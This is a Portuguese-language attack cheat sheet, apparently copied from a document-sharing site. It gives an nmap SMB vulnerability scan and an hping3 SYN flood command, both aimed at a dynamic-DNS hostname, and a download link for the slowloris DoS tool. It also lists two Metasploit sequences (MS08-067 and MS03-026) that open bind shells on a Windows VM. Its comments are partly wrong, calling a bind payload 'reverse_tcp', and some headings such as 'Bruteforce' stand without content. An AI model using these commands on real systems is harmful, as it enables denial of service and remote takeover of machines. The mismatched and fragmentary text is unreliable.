Escolar Documentos
Profissional Documentos
Cultura Documentos
Comando:
nmap -v --script=smb-check-vulns dns.no-ip.org
-v = Modo Verbose
--script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo,
MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
192.168.0.0/24 = Range de IP utilizado em minha rede local.
Bruteforce
Gerar arquivo com senhas numericas para bruteforce.
DDOS
slowloris
Fazer o download do slowloris no site:
http://ha.ckers.org/slowloris/slowloris.pl
Comando:
hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood dns.no-ip.org
Slowhttptest
use exploit/windows/smb/ms08_067_netapi
#Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.1.103
#Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/shell_bind_tcp
#Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa
comunicação entre LHOST e RHOST.
set LHOST localhost
#Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
exploit
#E finalmente executamos nosso exploit.
METASPLOIT 2
use exploit/windows/dcerpc/ms03_026_dcom
set RHOST 192.168.1.103
set PAYLOAD windows/shell_bind_tcp
set LHOST localhost
exploit